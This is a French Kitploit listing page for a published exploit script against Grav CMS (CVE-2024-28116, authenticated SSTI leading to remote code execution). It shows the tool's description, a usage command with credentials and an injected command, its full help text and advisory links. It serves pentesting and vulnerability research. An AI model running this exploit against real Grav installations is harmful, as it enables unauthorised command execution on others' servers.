Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Grav-CMS-RCE-Authenticated — Exploit contre Grav CMS (versions inférieures à 1.7.45) qui permet l'exécution de code à distance pour un utilisateur authentifié - CVE-2024-28116 | Kitploit
Outils/GitHubGitHub/gunzf0x/grav-cms-rce-authenticated
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubgunzf0x/grav-cms-rce-authenticated

Grav-CMS-RCE-Authenticated

Exploit contre Grav CMS (versions inférieures à 1.7.45) qui permet l'exécution de code à distance pour un utilisateur authentifié - CVE-2024-28116

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exécution de code à distance dans Grav CMS (Authentifié) - CVE-2024-28116

Informations

Ce code est une adaptation du dépôt Github Graver avec quelques améliorations basées sur cette vidéo.

Exploit contre Grav CMS (pour les versions antérieures à 1.7.45) basé sur des vulnérabilités SSTI + RCE, identifiées sous le nom CVE-2024-28116. Ce script crée une page avec la vulnérabilité, l'exécute et, enfin, supprime la page après l'exécution.

Utilisation

root@kitploit:~
python3 Grav_CMS_RCE.py -t http://10.10.10.10 -u 'admin' -p 'S3cureP4ssw0rd' -x 'ping -c 1 10.10.10.9'

Message d'aide :

root@kitploit:~
$ python3 Grav_CMS_RCE.py -h

usage: Grav_CMS_RCE.py [-h] -t TARGET [-P PORT] -u USERNAME -p PASSWORD -x COMMAND [--no-delete-file] [--panel-route PANEL_ROUTE] [--no-banner] [--show-warnings]

Grav CMS RCE (Authenticated).

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL where Grav CMS is running. Example: http://10.10.10.10
  -P PORT, --port PORT  Port running Grav CMS. Default: 80
  -u USERNAME, --username USERNAME
                        Username to authenticate in Grav CMS
  -p PASSWORD, --password PASSWORD
                        Password for the user in Grav CMS.
  -x COMMAND, --command COMMAND
                        Command to inject/run.
  --no-delete-file      Do NOT delete the generated files. Useful to check command execution output.
  --panel-route PANEL_ROUTE
                        Admin Panel route in Grav CMS. Default: /admin
  --show-warnings       Show warnings (if there are).

Si pour une raison quelconque nous ne souhaitons pas supprimer les fichiers générés, nous pouvons utiliser l'option --no-delete-file, visiter la page indiquée par le script et lire la sortie de la commande.

Plus d'informations

Plus d'informations sur CVE-2024-28116 / cet exploit :

  • Testé sur Grav CMS v1.7.44 - Admin 1.10.44.
  • https://github.com/akabe1/Graver
  • https://nvd.nist.gov/vuln/detail/CVE-2024-28116
  • https://ethicalhacking.uk/videos/CVE-2024-28116/#gsc.tab=0
  • https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh

Avertissement

Le propriétaire de ce dépôt n'est pas responsable de l'utilisation de ce logiciel. Il a été créé à des fins éducatives uniquement.

Licence

MIT

Télécharger l’outil